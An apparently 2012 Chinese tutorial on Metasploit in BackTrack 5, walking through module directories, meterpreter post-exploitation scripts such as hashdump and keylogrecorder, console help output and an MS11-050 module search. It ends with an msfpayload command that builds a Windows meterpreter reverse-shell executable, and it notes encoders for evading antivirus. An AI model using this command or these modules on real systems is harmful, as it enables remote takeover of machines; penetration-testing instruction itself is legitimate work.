一、msf (metasploit framework)讲解
环境 bt5 R3
root@bt:/# cd /pentest/exploits/framework
可以看到相关的接口 msfcli msfconsole,msfd .............
主要用到的有 msfconsole msfpayload scripts msfencode...
exploits 一些攻击脚本
payloads是exploits 成功后进行的操作 如反弹shell
encoders 编码 对 payloads进行一定的编码等保护 避免被查杀
nops 对exploits的保护,避免被远程主机的IDS 等发现
auxiliary: 对主机进行扫描,系统应用的指纹
plugins 对 MSF 进行扩展, 如提供对扫描模块的支持、数据库支持等
root@bt:/pentest/exploits/framework/modules# ll
total 36
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ./
drwxr-xr-x 13 root root 4096 2012-08-26 02:56 ../
drwxr-xr-x 19 root root 4096 2012-08-26 02:56 auxiliary/
drwxr-xr-x 11 root root 4096 2012-08-09 17:49 encoders/
drwxr-xr-x 15 root root 4096 2012-08-26 02:23 exploits/
-rw-r--r-- 1 root root 733 2012-05-03 17:25 modules.rb.ts.rb
drwxr-xr-x 9 root root 4096 2012-08-09 17:49 nops/
drwxr-xr-x 5 root root 4096 2012-08-09 17:49 payloads/
drwxr-xr-x 9 root root 4096 2012-08-09 17:49 post/
进入 modules 目录可以看到主要有 5、6 类模块
root@bt:/pentest/exploits/framework/modules# cd exploits/ 可以看到针对不同系统的漏洞攻击
root@bt:/pentest/exploits/framework/modules/exploits# ll
total 60
drwxr-xr-x 15 root root 4096 2012-08-26 02:23 ./
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ../
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 aix/ aix系统
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 bsdi/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 dialup/
drwxr-xr-x 6 root root 4096 2012-08-09 17:49 freebsd/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 hpux/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 irix/
drwxr-xr-x 18 root root 4096 2012-08-09 17:51 linux/ linux系统
drwxr-xr-x 15 root root 4096 2012-08-09 17:49 multi/
drwxr-xr-x 4 root root 4096 2012-08-09 17:49 netware/
drwxr-xr-x 13 root root 4096 2012-08-09 17:49 osx/
drwxr-xr-x 7 root root 4096 2012-08-09 17:49 solaris/
drwxr-xr-x 9 root root 4096 2012-08-09 17:51 unix/
drwxr-xr-x 50 root root 4096 2012-08-09 17:51 windows/
root@bt:/pentest/exploits/framework/modules/exploits# ls windows/ 看到很多是windows系统的溢出使用
antivirus dcerpc ftp isapi misc nntp scada telnet
arkeia driver games ldap mmsp novell sip tftp
backdoor email http license motorola oracle smb unicenter
backupexec emc ids local mssql pop3 smtp vnc
brightstor fileformat iis lotus mysql postgres ssh vpn
browser firewall imap lpd nfs proxy ssl wins
root@bt:/pentest/exploits/framework/modules/auxiliary# ll auxiliary 和 exploit 的区别是 auxiliary 没有 payload, 所以该类模块一般用来扫描
total 76
drwxr-xr-x 19 root root 4096 2012-08-26 02:56 ./
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ../
drwxr-xr-x 34 root root 4096 2012-08-09 17:49 admin/
drwxr-xr-x 2 root root 4096 2012-08-09 17:51 analyze/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 bnat/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 client/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 crawler/
drwxr-xr-x 20 root root 4096 2012-08-09 17:49 dos/
drwxr-xr-x 10 root root 4096 2012-08-09 17:49 fuzzers/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 gather/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 pdf/
drwxr-xr-x 48 root root 4096 2012-08-09 17:49 scanner/
drwxr-xr-x 4 root root 4096 2012-08-09 17:49 server/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 sniffer/
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 spoof/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 sqli/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 voip/
drwxr-xr-x 5 root root 4096 2012-08-09 17:49 vsploit/
drwxr-xr-x 4 root root 4096 2012-08-26 02:36 xssf/
root@bt:/pentest/exploits/framework/scripts# ll 相当于 payload 可以返回shell
total 24
drwxr-xr-x 6 root root 4096 2012-08-09 17:49 ./
drwxr-xr-x 13 root root 4096 2012-08-26 02:56 ../
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 meterpreter/ 一般这个比较有用 windows/meterpreter/reverse_tcp
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 ps/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 resource/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 shell/
root@bt:/pentest/exploits/framework/scripts# ls meterpreter/ meterpreter脚本利用
arp_scanner.rb get_pidgin_creds.rb remotewinenum.rb
autoroute.rb gettelnet.rb scheduleme.rb
checkvm.rb get_valid_community.rb schelevator.rb
credcollect.rb getvncpw.rb schtasksabuse.rb
domain_list_gen.rb hashdump.rb scraper.rb
dumplinks.rb hostsedit.rb screenspy.rb
duplicate.rb keylogrecorder.rb screen_unlock.rb
enum_chrome.rb killav.rb search_dwld.rb
enum_firefox.rb metsvc.rb service_manager.rb
enum_logged_on_users.rb migrate.rb service_permissions_escalate.rb
enum_powershell_env.rb multicommand.rb sound_recorder.rb
enum_putty.rb multi_console_command.rb srt_webdrive_priv.rb
enum_shares.rb multi_meter_inject.rb uploadexec.rb
enum_vmware.rb multiscript.rb virtualbox_sysenter_dos.rb
event_manager.rb netenum.rb virusscan_bypass.rb
file_collector.rb packetrecorder.rb vnc.rb
get_application_list.rb panda_2007_pavsrv51.rb webcam.rb
getcountermeasure.rb persistence.rb win32-sshclient.rb
get_env.rb pml_driver_config.rb win32-sshserver.rb
get_filezilla_creds.rb powerdump.rb winbf.rb
getgui.rb prefetchtool.rb winenum.rb
get_local_subnets.rb process_memdump.rb wmic.rb
root@bt:/pentest/exploits/framework# msfconsole 进入 msf 控制台 (交互模式)
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf > search ms11_050 查找功能
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 00:00:00 UTC normal MS11-050 IE mshtml!CObjectElement Use After Free
show exploits
show payloads
show targets
root@bt:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 X > /home/anubis/mm.exe #X表示生成可执行文件
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.0.106", "LPORT"=>"4444"}